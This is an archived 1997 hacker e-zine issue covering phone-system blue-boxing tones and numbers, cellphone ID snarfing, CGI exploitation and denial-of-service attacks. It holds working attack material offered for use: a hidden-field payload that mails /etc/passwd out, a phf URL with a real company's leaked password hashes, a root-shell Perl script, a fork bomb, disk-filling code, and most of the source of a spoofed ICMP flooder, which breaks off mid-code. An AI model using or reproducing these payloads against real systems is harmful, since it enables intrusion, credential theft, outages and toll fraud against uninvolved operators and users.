The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / n_z / thtj8.txt < prev next >

Wrap

Text File | 2003-06-11 | 64.5 KB | 1,841 lines

╒══════════════════════════════════════════════════════════════════╕ │The HAVOC Technical Journal │▒ └──────────────────────────────────────────────────────────────────┘▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ Vol. 1 | No.8 | March 1st, 1997 | A HAVOC Bell Systems Publication HBS: "we're ereet" _____________________________________________________________________________ Inside this issue: Whats new this issue.............................. Editorial.........................................Scud-O Blue Boxing in France Pt. II......................memor Fiber Optics......................................Keystroke evilempire.org....................................Scud-O Snarfing..........................................FuScAT CGI Insecurities Part III.........................Scud-O Denial Of Service Attacks.........................Scud-O The 'g0d' Project.................................Scud-O RTFM: UNIX Basics................................. HBS............................................... Next Month........................................ ---------------------------------------------------- evilempire.org - the future of hbs - comming soon! ---------------------------------------------------- ___________________________________________________________________ Editorial by Scud-O First off, I want to apologize for the poor quality of issue 7. I was worried that it would not be 100k, so I added some crap, and I know that I shouldn't have. This is NOT what you have or should come to expect from HBS and The HAVOC Technical Journal in particular. Anyway, next month KungFuFox is going to guest edit, and Keystroke and disc0re will help him collect articles and distribute them. I am going to be ram-rodding thtj down everyone's throat, and getting more and more people to read thtj. This break will from editing will allow me to get back on track with school, and focus more so that I can write better articles. Issue 8 has gone fairly well, I am proud of it, and I think it is one of our greatest yet. However, only a few people contributed to it, so I have worked extra hard on my articles, especially the Denial Of Service article, which I feel is probably the best writing I've done so far. So read it and tell me what you think. This issue may even tie or beat issue 6 as our best issue ever. I'll be getting the web page fixed up, adding the files page, getting linux installed on my computer again, getting the ISP ready, raising funds for the ISP, getting my ICMP project done, and getting HBScript aka mIRC HAVOC Bell Systems version 1.0 done. Hopefully somewhere in there I'll still have time for a life and fun. geez... just saying it all makes me tired.... ---------------------------------------------- / ---/ --/ / / | /------/ / / /--- /-----/------/-----/ / / / /----------/ -of HAVOC Bell Systems- /--------/ "The eLiTe lammah!" FoxMulder@worldnet.att.net | http://www.geocities.com/SiliconValley/8805 "You're Spiro Agnew and I'm the Dick you answer to." - 'Boom' , Bloodhound Gang with Rob Van Winkle ___________________________________________________________________ French Phreaking & Blueboxing. By memor 1.1 *** French Phreakers Politics. 1.11 Teletel Network In France. 1.12 Warez Business & Phreaking. 1.2 *** Type Of Phone Numbers In France. 1.21 Local & National Highly Dangerous # Numbers. 1.22 0800 Dangerous Free # Numbers. 1.23 080090xxxx & 080091xxxx Free BlueBoxing # Numbers. 1.24 1800 & Operators # Numbers. I --- French Phreaking & Blueboxing. 1.1 *** French Phreakers Politics. French phreaking scene is mostly using lame Calling Card (was using it because now with the Cartes Pastelles (pastels cards)) , calling card made by France Telecom it is hardest to fraud (361010) and law are now really bad with Carders.. Credit or Calling. Blueboxing dude are not searched by cops and/or France Telecom so that make us having some little skills in Blueboxing. 1.11 Teletel Network In France. Well first Use of bluebox was to come on the Teletel Network (explained in bif.txt) that 3615 network is really expensive and slow (1200bds-v23) so we had (when we were young) to use bluebox for connecting it and staying on really long times (like how we are doing on irc now) , personnaly i used that for connecting 3615 RTEL , a server which was talking about computers, cracking and computers selling. note: nua of RTEL is 020803506031801 France____]\/[__________Server RTEL. city nammed rennes________| Rtel is still alive, it uses videotex terminals (you can get it on ftp.minitel.fr or ftp.ibp.fr) , and you must have a modem which knows v23 (for USR sportster v23 is ATS34=8 ATZ) 1.12 Warez Business & Phreaking. The paradox team (France) was using calling card for accessing somes BBS in usa and downloading Super Ninterdo Games, PC and Amiga Warez.. but their calling cards died, so they fastly learnt bluebox for making their business living again.. they were bluboxin to usa for dlding games and selling it in France.. they all got busted. 1.2 *** Type Of Phone Numbers In France. 1.21 Local & National Highly Dangerous # Numbers. The local phone numbers, numbers that u must pay at the connection opening (0.73FF ... 5$US=1FF) and after u have to pay a taxe/min like 0.23FF/min so that phone are not really interesting for blueboxing because u still pay something.. well maybe interesting for calling an another country but for calling somewhere in france, thats not interesting at all, National Phone numbers are same (0.73FF at connection opening) but after , you pay more. Well.. you want to bluebox on that phone number, ok you are a good phreaker, you scan and u pass all the filters of the french system.. you find frequencies like: Freq1 : voice1:2700 voice2:2650 lenght:130ms delay:10ms Freq2 : voice1:2570 voice2:2430 lenght:300ms delay:10ms After , you redial in France for calling that hospital : Dial_Seq:A0380293031C local_]\/[___________________________Hospital Number of dijon For calling Provence Now france is divided in parts like A01 <- Paris A02 <- Province (East of France) A03 <- South Of France / Province Well you can call another country via or Routine Code Dial_Seq:A001(USA PHONE NUMBER)C A00 is for calling a foreign country or via Dial_Seq:B01(USA PHONE NUMBER)C B for an international call. But well if a company or someone you bluebox on ask France Telecom about a fraud, France telecom uses for his local/national phone numbers a big loging (1 month loging for each phone number) which is written Who Call <-> Who is Called <-> Lenght <-> Date / Times 11111111 - 222222222 - 3Hours - 25/12/96 / 00:00 22222222 - B01xblahxC - 2H59Mn - 25/12/96 / 00:01 11111111 is you so u can be located.. be careful.. numbers really dangerous. 1.22 0800 Dangerous Free # Numbers. 0800 numbers are free phone numbers in france , same method for blueboxin on like France local/national phone numbers , but same danger. 1.23 080090xxxx & 080091xxxx Free BlueBoxing # Numbers. That ones are more more interesting, because they are free phone numbers but for calling anothers countries.. like calling KornFlex(USA) from a 080090xxxx , with that ones, you can call... most of the countries like Perou, Chili, USA, Canada(0800908026), UK, DE ,... Well you can bluebox on it , but you must know the frequencies of the countrie. like for coloumbia: Freq1:2600 Freq2:2550 lenght:150ms delay:10ms Freq1:2400 Freq2:2350 lenght:300ms delay:10ms dial in CCITT#5 ... coloumbia in not really interesting , because you can only phone in local coloumbia ... BxxxxC will sux... only AxxxxxC works if you dont try to use a routine code, it will hang up to busy if you try that. No logs on that numbers. 1.24 1800 & Operators # Numbers. 1800 numbers are free for calling foreign countries operators but i know it is not logged , so its "safe" to blueboxe on it, i know some person which do that (Dominicana Republic) from their home,We scanned Chili with a friend at home, well the sure thing is that we are not busted and we did that 1 month ago. Dominicana Republic died 5-6 months ago. Now some numbers for Calling France Direct (A french operator) for free from your countries: Argentina 0033800999111 Australia 1800881330, 180055144(ccs) Austria 022903033 Belgium 080010033, 080010330 Brasil 0008033 Canada 18003634033, 18004636226(ccs) Chili 123003331 China 10833(big cities only) Colombia(1)980330057 Colombia(2)980330010(ccs) Korea 0090330, 003933 Denmark 80010033 Dom.Rep 18007510600 EAU 8001133 Finland 980010330 Gabon 00033 Germany 0130800033 Greece 008003311 Hawaii 18008653313 HK 8000033, 80003311(ccs) Hungary 0080003311 Iceland 8009033 Indonesia 001801331 Ireland 1800551033, 1800550033(ccs) Israel 1773302727 Italy 1720033 Japan(1) 0039331, 0031005533(ccs) Japan(2) 004422333333(ccs) Lux. 08000033(ccs) Malaysia 8000033(ccs) Morocco 002110033 M.i. 73331 Mexico 98800332001 Norway 80019933 New-Cal. 000933 New-Zel. 000933 UK(1) 0800890033 UK(2) 0500890033(ccs) Spain 900990033 Sweden(1) 020799033 Sweden(2) 020799133(ccs) Uruguay 000433 USA(1) 18005372623, 18009372623 USA(2) 180047372623(ccs), 18008727835(ccs) USA(3) 18007278350(ccs), 18002510841(ccs) ___________________________________________________________________ Fiber Optics by Keystroke I explained the first main fiber optic project in my last article for HAVOC (the TAT-8). Here, I will try to give you a brief overview of fiber optic communications. Fiber Optics Communications Fiber Optics Communications or lightwave communications A typical fiber optics communications system consists of three basic components: 1. Optical Transmitter 2. Optical fiber 3. Optical Receiver 4. Havoc (Optional) The transmission of information over a distance using optical fiber usually requires several steps. First, the the info is converted into an electrical signal (if it is not already in that form). Second, the electrical signal is changed into an optical signal w/ the help of an optical source. Third, the optical signal is transmitted through the optical fiber. Fourth, the optical signal is detected and converted into an electrical signal with the help of an optical detector. Finally, the signal processing is done. Below are some more specific optical fibers, recivers, etc Electrical Interface - Electrical Modulator, encoder, multiplexer, etc. Optical transmitter - Led, laser diode optical fiber - Monomode step index fiber, multimode step-index fiber, multimode graded index fiber Optical receiver - pin diode, apd, photo transistor, photo darlinton electrical interface - electrical demodulator, decoder, demultiplexer, etc. Theoretically, an optical signal with a wavelength of 1 micrometer, a bandwidth of 300 THz is possible. Presently, the maxium bandwidth is only 10 Gbps :p Monomode step index is best for long haul projects (less transmission loss) while multimode is better for short haul (more loss, but also more speed) There are 3 types of optical fiber: Monomode step index fiber, multimode step-index fiber, and multimode graded index fiber. There are many benifits of fiber optic communication: Large Bandwidth (explained above) Small size and weight (tens of micrometers smaller than the diameter of a human hair and MUCH smaller and lighter than copper (sic) cables) Dielectric construction - No ground lops are required (no external electromagnetic fields) Low transmission loss - (monomode fibers loose .2 db/km multimode 1db/kb - not many repeaters necessary) EMI & RFI immunity - No cross talk because there is no generation of electrical or electromagnetical noise or interfierence Signal security - Optical fibers do not radiate energy. Can't be tapped in a non-intrusive manner. (Military and banks use them) High reliability and durability - cant corrode - cant oxidize - can be used in explosive or nuclear enviroment Now to compare optical sources LED vs. Laser Diode Spectral width Large 30-40 nm Narrow 1 - 2 nm Modulation bandwidth 1 Gbps 6 -10 Gbps Insertion loss 10 -15 db 3 db Output power 1 -5 mW 5 - 15 mW Life expectancy 100 million hours 1 million hours Temperature Sensiviaty Tolerant Sensitive Beam divergence Large Narrow Cost Low High Optical Detectors PIN (P-type Intrinsic, N-type) APD Sensitivity Low High Cost Low High Temp. Sensitiv. Tolerant Sensitive Bias Voltage Low (10-50 V) High (100-300 V) As you can see, fiber optic communication is far superior to what is in use today in the majority of the world (copper wire). - Keystroke ___________________________________________________________________ evilempire.org -------------- evilempire.org login HBS Unix 5.0 -=- linux kernel 1.3.20 User: Password: ------------------------------------- Imagine........ evilempire.org is to be the future of HBS, our up and coming ISP. We are currently filing for the domain with InterNIC, and plan for Defraz to run a simple vdomain for us until we get minos ( the ISP computer) built. evilempire.org will start up with at least 2gb of space or so, and we will expand as we need to, and as funds allow. we plan for the computer to be co-located ( basically this means at an ISP's building, with a t1 connection) but with a modem and a line to for my internet access, and possibly psych0's if he pays me. We will be offering accounts for a low fee, which will help us cover the cost of start up ( hopefully about only 1000$) and the monthly cost of start up ( about 300$ a month). As we get more and more users, accounts will get cheaper, as we will only be usng the money to pay for the monthly fees and the costs to upgrade hardware, etc. When we start, we will have 1gb of space for users, since about 1gb will be used for linux and misc software, FTP files, newsgroups, etc. However, if we can piggy back off of the ISP that will run us, we may use their newsgroups and then offer more space to users. We currently need at least 30 users to make this happen, so i am offering the following, The first 35 to 40 people that sign up, i will give you slashed prices on accounts when i have more people using the service, and will make your accounts free if i make enough to cover for your accounts. And, as i gain users, i will start to offer different accounts if people say, only want to run a bot or two on the account, i will lower the price. As of 3-3-97 Our pricing plan: ---------------------------------------------------- $5/mo email + newsgroups $10/mo full shell $15/mo secured shell * $5/mo bot account only $10/yr for each 10mb after the quota limit $15/yr FTP account ** * a secured account will offer more leanancy if you use the server to run attacks on servers, etc. However, we WILL suspend your account if you abuse IRC and i get e-mails that if you do not stop, they will ban our domain. I AM NOT going to get evilempire.org banned from every IRC server out there!!! ** The FTP accounts will assure that you can get the files you need, since we plan to have a LARGE file collection, but only about 5 anonymous FTP's at a time. All shell accounts come with this. All shells come with: CGI-BIN, all UNIX stuff, many IRC progs, tons of DOS attackers, FTP access, mailbombers, allowed to run bots, and about 20-50+ mb of space! ------------------------------------------------------------------- We plan to get the server up be June or July, so send in the money soon if you want a premium account! E-mail me at: FoxMulder@worldnet.att.net for more information, and since our PO Box is not up yet. evilempire.org PO Box XXXX Sykesville, MD 21784 heh computers: limbo: (current computer) 486/66 ( was a 50, pushed to 66) 8 mb ram 245 md ide hd 1 gb scsi hd 2x cd-rom 28.8 modem minos: ( future computer at co-location) 486/100 16mb ram 2 gb ide hd probably no cd drive 28.8 modem (maybe) 10mbps ethernet card connected to t1 line lucifer(?) ( future computer at my house) pentimum 200 (mmx?) 32-64mb ram 2-9gb hd ( ide or scsi) 8x-12x cd-rom 28.8 modem 10mbps ethernet (and another for limbo) ( after the site us up and we have money, we will uprade to probably a pentium 200 Pro or so, with 64-128 mb ram, several gigs hd, SCSI to support the hard drives, etc. Then maybe some day i will get a t1 right into the server and run ti at my house! (not likely) ) ___________________________________________________________________ Gettin the Digits by FuScAT (*** ed note: although this article does not go as indepth as i had hoped, it none the less give you a good over view of 'snarfing' ***) Basically we are dealing with the concern of obtaining Electronic Serial Numbers (ESNÆs) and Mobile Identification Numbers (MINÆs) for reprogramming cellular fones. Really there are about three basic ways to go about doing this that I am currently aware of. If you Know of any other please let me know about them. First: Social Engineering You could call up your cell provider and ask for a service man to come take a look at your fone. They will give you a name and say he will be there shortly. Then about 10 minutes later call the provider back pretending to be the service man they just sent out, and with the proper jargon and know how you can squeeze the info out of them. Really not very affective and frankly probably more of a waste of time... Second: A CellScope Its a fairly simple few pieces of hardware and software consisting of a cellfone, a palmtop pc(or laptop), the proper software, and an antenna. Basically the cellfone is used to scan the channels and frequencies of the cell sites, when a number in use is displayed on the screen from the software you can lock in on it and the warez will snag the ESN & MIN for you leaving it in plain english for you to use..VERY PRACTICAL but highly unaffordable. (unfortunately cus Im sure we would ALL love to have one), and oh yea only usable by law enforcement agencies or private detectives...(grin) Finally Modified Scanner There is a way to modify a handheld police scanner to do virtually the same thing the CellScopeÆs cellfone does. You can make a few (quiet a few) modifications to your scanner to make it scan the cellular frequencies. Now you will also need the hardware for this, being the connector cable you will need to connect your scanner to your pc or laptop. Then with the the right software and the know how you will be able to snag ESNÆs & MINÆs If I am mistaken in any way PLEASE correct me...and if anyone knows of other ways to get the digits please let us know... --FuScAT ___________________________________________________________________ CGI Insecurities Part III.........................Scud-O ---------------- NOTE: HBS brings it to you first! We started on CGI weaknesses in October, phrack brought CGI weaknesses in December! (sorry, just had to gloat a little!) ---------------- Well, this is the final chapter in my three part series of CGI Insecurities, and this will probably be the most useful parts of the whole series, since you can use these holes in scripts that are out there running. This part of the article covers many topics, but it also focuses mostly on shell escapes. Many cgi ( especially perl scripts) use calls to unix commands (mostly sendmail or mail) to get simple serivces done. Shell escapes: Many, many,many CGI scripts are vunerable, since they use mail, or even sendmail <gasp> (what the hell is wrong with those CGI scripters? dont they know that sendmail has holes?). Using for example ~ or other shell escape codes, it is possible to get a shell on the remote systems to cause heh, HAVOC! Sendmail is also a BIG hole here, since sendmail holes can be cracked and exploited by the CGI program. system() : Another big weakness is the gold old system call, which i presented in issue 6 (however that was for c, but the basics are the same). If you find a system(), or even an exec() call, you can modify the html document by, if you use nutcrape (im not covering IE, since it is the devil!) by clicking, view, then document source, then change the CGI to system("command_to_run") , (command_to_run of coursing being the comand you want to use) save the file, relaod nutscrape, and use it. Depending on how the CGI is coded, you might need to add the sites address here and there, but i will leave that to you. <input> fun: Another way to get the password file, is similar to the file i did way back in issue 4, but this is a hidden input tag ( normally used to store information from page to page, much like 'cookies' do) which sends you an email with the passwords. ex: <input type="hidden" name="mail_to" value="info@site.com; mail you@your-isp.com < /etc/passwd"> This then, sends you the password file. phf: ----------- This bug is pretty common knowledge now, but basically, you enter the following: http://site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd This then returns to you, a copy of the password file. If you dont believe me, that something like that could be so simple, try perrier.com . I got this when i tried: -------------------------------------------------------------- <H1>Query Results</H1> <P> /usr/local/bin/ph -m alias=X /bin/cat /etc/passwd <PRE> root:WnDFHddnKu28M:0:1:system PRIVILEGED account:/:/bin/csh nobody:*Nologin:65534:65534:anonymous NFS user:/: nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/: daemon:*:1:1:system background account:/: bin:*:3:4:system librarian account:/bin: uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico uucpa:Nologin:4:2:uucp adminstrative account:/usr/lib/uucp: auth:*:6:11:Authentication Subsystem:/tcb/bin: cron:*:7:14:Cron Subsystem:/usr/adm/cron: lp:*:8:12:Line Printer Subsystem:/users/lp: tcb:*:9:18:Trusted Computing Base:/tcb: adm:*:10:19:Administration Subsystem:/usr/adm: ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh locker:Nologin:12:15:locker:/usr/users/locker:/bin/sh per-surv:Nologin:204:1:Perrier Survey Email address:/opt/per-surv:/bin/csh calvert:Nologin:205:1:Calvert Deforest Email address:/opt/calvert:/bin/false thebrains:Nologin:206:1:jrap Email address:/opt/jrap:/bin/false jrap-surv:Nologin:207:1:jrap survey addr:/opt/jrap:/bin/csh footlocker:Nologin:208:1:footlocker survey:/opt/footlocker:/bin/csh ftp:*:500:25:Anonymous FTP user:/data/web/public/ftp:/bin/false eds:RbaQ09DoC7MXg:501:26:EDS FTP user:/data/clients/eds:/bin/false unprod:mD8.fz9LD.Tw6:210:32:unproductions FTP user:/data/web/public/calvert:/bin/false bardhl:pm59ch9LkeaqY:211:33:Bardahl FTP User:/data/web/public/bardahl:/bin/false </PRE> ---------------------------------------------------------------------------- Pretty slick no? Anyway, have fun cracking their passwords..... one last thing.... -------------------------- exploit.pl This script while only 4 lines of code, gives you (or who ever runs this script) a shell to do, well what ever you please. #!/usr/bin/perl $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash"); ---------------------------------- I want to thanks all of you for reading this, and I want to give thanks for the knowledge of CGI and its weaknesses, and thanks to memor for telling me to try out phf on perrier.com.... Scud-O ___________________________________________________________________ [The Modern Guide to Denial of Service Attacks] History and Modern Uses by Scud-O Denial of Service (DOS) Attacks are nothing new. Many old versions of UNIX would crash with this little bit of code if an administrator did not see all the processes running. main() { while(1) fork(); } I remember crashing a few systems with this little prog, and a system will go down fast if this is not seen by an admin. Basically this program spawns ( or forks) another process of it self which then spawns more, and so on. This is a total attack since all of the chold processes are waiting for new processes to be established, so even if you kill one process, another will take its place. However, most current versions of UNIX are immune to this attack since users are limited to a maximum number of processes (except root). Most UNIX versions have the max number of processed buitl into the kernel, but Solaris for example lets the value ( MAXUPROC) be set at boot time, in etc/system under set maxuproc=100 (or whatever the sysadmin has set it to be). However, if you have several accounts on a system, or have some friends with accounts, you all can take down the system by running the program. Having too many processes is a great challenge for sysadmins to fix without having to reboot the system, since: a) You can not run ps to determine what process numbers to kill, and b) if you are not logged in as super user, yuo cannot use su or login because both of these functions require the creation of a process, which, if you system is overloaded, is impossible. However, most sysadmins do not want to shut down their system by just flicking off the power, since virtually no systems are designed to undergo a fast, orderly shutdown when quickly powered off. And sysadmins know that hitting the power is not good for the disk, since it may lose disk blocks, and it will not flush the buffers to disk, thus losing any unsaved work. So admins are left to randomly killing processes, or if their system supports it, doing a kill -TERM -1 , which sends a SIGTERM to all processes except superuser processes and system processes. ________________ Disk Attacks: Another old method of attack is the old disk attacks, such as filling up the hard disk, or tree-structures, bot presented below. Hidden Space: This is a form of attack that will work very well as long as the computer it is on is run 24 hours a day. Basically the sample bit of code below creates and keeps a file open, thus making it invisible to du or find, yet still takeing up space. This is due to the fact that unlinked files are not in the directory tree, yet they still take up space. filename: fillup.c #include <stdio.h> #include <stdlib.h> main() { int ifd; chat buf[8192]; ifd= open("./attack", O_WRITE| O_CREAT, 0777); unlink("/.attack"); while(1) write(ifd,buf, sizeof9buf)); } This little program, after creating the file, runs an infinite loop, which continues to fill up disk space, and stops anything from being worked on since the disk will be filled up. Try using a ls or du to see the file and it will not be there, causing the sysadmin some confusion. That is unless they have a copy of lsof on hand, or they kill the process or all processes. Now to make this go faster, always run this in the background, and then run a few more copies just for good measure. * HINT: one way to get this to work faster, is to add a fork() call in the program, thus making it run multiple copies, and filling up the drive faster. ----------------- Tree-scructure attacks These are actually quite lame and weak, but they can still cause some problems, since a tree could be made that is too deep to be deleted by rm. (HINT: for a very good attack, combine this and the attack up above, to make a huge directory with huge files!) a sample shell script that makes these directories and fills them up is below: $!/bin/ksh $ $ Dont try this at home, unless you are quite foolish! while mkdir anotherdir do cd ./anotherdir cp /bin/cc fillup done On many systems rm- r just cannot delete trees this big, since they can overflow buffers or limits on the number of filenames or open directories at one time. using chdir you can delete them manually, but this is quite boring so most admins would just write a script to do this. (e-mail me if you need the script) ------------ /tmp On many UNIX systems out there today, both users and programs can create files of unlimited size in the /tmp directory for temporary usage. Now, you can simply about this vunerability by using the fillup.c or tree structure progs above and fill up the /tmp dir and conscequentally fill up the entire disk. ------------------ Network Attacks: ------------------ Okay, you are proably saying, hey great, i have these methods to attack a local system i have an account on, but what about remote systems that i may not have an account on? well, thanks to daemon9 and other coders out there, there is an abundancy of remote DOS attacks. We are also lucky, to date no firewall really protects from a DOS attack, but watch that change soon. With all the hype and press about DOS atacks on ISPs, firewalls will soon be able to block DOS. For daemon9's article on TCP/SYN flooding, either a) goto http://www.geocities.com/SiliconValley/8805/files.html and scroll down to 'phrack' and click on issue 48 b) goto http://freeside.com/phrack.html and scroll down to past issues and get issue 48 c) or ftp.fc.net/pub/phrack/ and get phrack 48 You will want article 13 which is Project Neptune by daemon9. daemon9 gives a great indepth analisys of TCP/SYN flooding and offers a great C program to attack systems. Now the basic info on TCP/SYN flooding presented here is nowhere near as informative as daemon9's since i have not spend as much time on it as he has. What is below is a very simple explaination of the basic if the flood. First, we need to see a simple connection. TCP uses a 3 way hand shake to start up a conversation. ex: A B ---------> SYN <--------- SYN/ACK ---------> ACK Now if A is the client computer and B is the host, A sends a SYN to B, and B replies with a SYN/ACK , This tells the client that the server acknologizes the connection and then the client replies with an ACK, which says that it acknologizes the connection as well, and the connection is made. While a SYN is waiting to be processed, it sits in a backlog queue, waiting for the host to see it. Here is where the flood comes in. Since UNIX creates a backlog to prevent several SYNs filling up the memory ( which would make our job so much faster), we must fill up the queue. If you use a general IP Spoofer, (or the code in phrack 48) you can use it to make your connection appear to be coming from the spoofed IP, which MUST be unreachable so it cannot send a RST command. Basically, the client sends a SYN to the host, the host tries to reply, but it sends it to the spoofed IP, and since the IP will not respond, it will continue trying to make a connection, until it times out. So if you run several SYNs to a hosts port that you want to block, you can quickly fill up the queue, making the port dead, since it can handle no more connections. For code that does this, see phrack 48. -------------------- SMTP floods: -------------------- These are very simple to do, since STMP will pretty much accept just about anything that comes their way. I did a simple mailbomber in issue 7, so use that to mailbomb a server, try common accounts like postmaster@site or info@site, etc, and send the system either several VERY large files to fill up disk space, or many,many small mails to flood the STMP server with e-mails, and thus making it unusable. ----------------------------- ICMP_ECHO floods: ----------------------------- These attacks are some of the most common, since they are often used by IRC users to 'kill' other users, and thus many people i know are getting k-lines and nasty messages from sysadmins who are pissed that someone from undernet or another irc server has e-mailed them about you. Anyway, below is some sample code that Keystroke had, and although he will be pissed that i am adding it here, i am, so tough shit Key! (heh) This code may also be the basis of my ICMP killer win95 program i will be developing during the coming months, ( wish me luck on porting this from UNIX to Win95) Basically tthe following code works, since UNIX systems will reply to ICMP requests continually, not realizing that it may be halting the system by replying to what the system thinks are simple ICMPs. Now adding an IP spoofer to this setup, only makes things better since the computer will time out while trying to get a reply from these ECHOs while new ECHOs are also hitting the system, thus totally killing the system. ------------------------------------------- /* * echok.c * ICMP_ECHO Killer * * Author: Zakath Credits: LOTSA thanks to crisk * Don't be fooled. Very little is my orig code. * [03.13.96] */ #define RESOLVE_QUIET #define IPHDRSIZE sizeof(struct iphdr) #define ICMPHDRSIZE sizeof(struct icmphdr) #include <sys/types.h> #include <sys/socket.h> #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <netinet/ip.h> #include <netinet/in.h> #include <netinet/ip_icmp.h> #define ECHOK_VER "1.4" /* GENERAL ROUTINES ------------------------------------------- */ void banner(void) { printf("\n * ICMP ECHO Killer [v%s] - by Zakath *", ECHOK_VER); printf("\n * Code based on works by Crisk & Mike Muuss *\n\n"); } void usage(const char *progname) { printf("\nusage:\n "); printf("%s [-f <-n number>] [-s packet size] [-w wait] <spoof> <dest>\n\n",progname); printf("\t-f : enable flooding (ping -f)\n"); printf("\t-n <number> : number of pings to send\n"); printf("\t-s <size> : ICMP_ECHO Packet Size [Default is 64]\n"); printf("\t-w <time> : Wait time between packets [Default is 100]\n"); printf("\t<spoof> : address of fake ICMP packet sender\n"); printf("\t<dest> : destination of the flood message\n"); printf("\n"); } /* OPTION PARSING -------------------------------------------- */ unsigned char *dest_name; unsigned char *spoof_name = NULL; struct sockaddr_in destaddr, spoofaddr; unsigned long dest_addr; unsigned long spoof_addr; unsigned pingsize, pingsleep, pingnmbr; char flood = 0; int x = 1; /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* Nice resolve func. by crisk */ int resolve( const char *name, struct sockaddr_in *addr, int port ) { struct hostent *host; /* clear everything in case I forget something */ bzero((char *)addr,sizeof(struct sockaddr_in)); if (( host = gethostbyname(name) ) == NULL ) { #ifndef RESOLVE_QUIET fprintf(stderr,"unable to resolve host \"%s\" -- ",name); perror(""); #endif return -1; } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); addr->sin_port = htons(port); return 0; } unsigned long addr_to_ulong(struct sockaddr_in *addr) { return addr->sin_addr.s_addr; } int resolve_one(const char *name, unsigned long *addr, const char *desc) { struct sockaddr_in tempaddr; if (resolve(name, &tempaddr,0) == -1) { printf("error: can't resolve the %s.\n",desc); return -1; } *addr = tempaddr.sin_addr.s_addr; return 0; } int resolve_all(const char *dest, const char *spoof) { if (resolve_one(dest,&dest_addr,"dest address")) return -1; if (spoof!=NULL) if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1; spoofaddr.sin_addr.s_addr = spoof_addr; spoofaddr.sin_family = AF_INET; destaddr.sin_addr.s_addr = dest_addr; destaddr.sin_family = AF_INET; } void give_info(void) { printf("# target address : %s (%s)\n",dest_name,inet_ntoa(dest_addr)); printf("# spoof-from address : %s (%s)\n\n",spoof_name,inet_ntoa(spoof_addr)); if (pingnmbr) printf("# number of packets : %u\n",(pingnmbr)); printf("# icmp echo packet size : %u\n",(pingsize+36)); printf("# wait time between send : %u\n\n", pingsleep); } int parse_args(int argc, char *argv[]) { int opt; char *endptr; while ((opt=getopt(argc, argv, "fn:s:w:")) != -1) { switch(opt) { case 'f': flood = 1; break; case 'n': pingnmbr = strtoul(optarg,&endptr,10); if (*endptr != '\0') { printf("%s: Invalid Number '%s'.\n", argv[0], optarg); return -1; } break; case 's': pingsize = strtoul(optarg,&endptr,10); if (*endptr != '\0') { printf("%s: Bad Packet Size '%s'\n", argv[0], optarg); return -1; } break; case 'w': pingsleep = strtoul(optarg,&endptr,10); if (*endptr != '\0') { printf("%s: Bad Wait Time '%s'\n", argv[0], optarg); return -1; } break; case '?': case ':': return -1; break; } } if (optind > argc-2) { printf("%s: missing parameters\n",argv[0]); return -1; } if (!pingsize) pingsize = 28; else pingsize = pingsize - 36 ; if (!pingsleep) pingsleep = 100; spoof_name = argv[optind++]; dest_name = argv[optind++]; return 0; } /* * icmp_echo_send() * builds and sends an ICMP unreachable packet. Since ICMP unreachable packets * contain the IP header + 64 bits of original datagram, we create a bogus * IP header and the first 64 bits of a TCP header (ports and syn). * */ inline int icmp_echo_send(int socket, unsigned long spoof_addr, unsigned long t_addr, unsigned pingsize) { unsigned char packet[5122]; struct iphdr *ip; struct icmphdr *icmp; struct iphdr *origip; unsigned char *data; int i; ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet+IPHDRSIZE); origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE); data = (char *)(packet+pingsize+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE); memset(packet, 0, 5122); /* ip->saddr = spoof_addr; */ ip->version = 4; ip->ihl = 5; ip->ttl = 255-random()%15; ip->protocol = IPPROTO_ICMP; ip->tot_len = htons(pingsize + IPHDRSIZE + ICMPHDRSIZE + IPHDRSIZE + 8); bcopy((char *)&destaddr.sin_addr, &ip->daddr, sizeof(ip->daddr)); bcopy((char *)&spoofaddr.sin_addr, &ip->saddr, sizeof(ip->saddr)); ip->check = in_cksum(packet,IPHDRSIZE); /* origip->saddr = t_addr; this is the 'original' header. */ origip->version = 4; origip->ihl = 5; origip->ttl = ip->ttl - random()%15; origip->protocol = IPPROTO_TCP; origip->tot_len = IPHDRSIZE + 30; origip->id = random()%69; bcopy((char *)&destaddr.sin_addr, &origip->saddr, sizeof(origip->saddr)); origip->check = in_cksum(origip,IPHDRSIZE); *((unsigned int *)data) = htons(pingsize); /* 'original IP header + 64 bits (of bogus TCP header)' made. */ icmp->type = 8; /* should be 3 */ icmp->code = 0; icmp->checksum = in_cksum(icmp,pingsize+ICMPHDRSIZE+IPHDRSIZE+8); return sendto(socket,packet,pingsize+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8,0, (struct sockaddr *)&destaddr,sizeof(struct sockaddr)); /* ICMP packet is now over the net. */ } /* MAIN ------------------------------------------------------ */ void main(int argc, char *argv[]) { int s, i; int 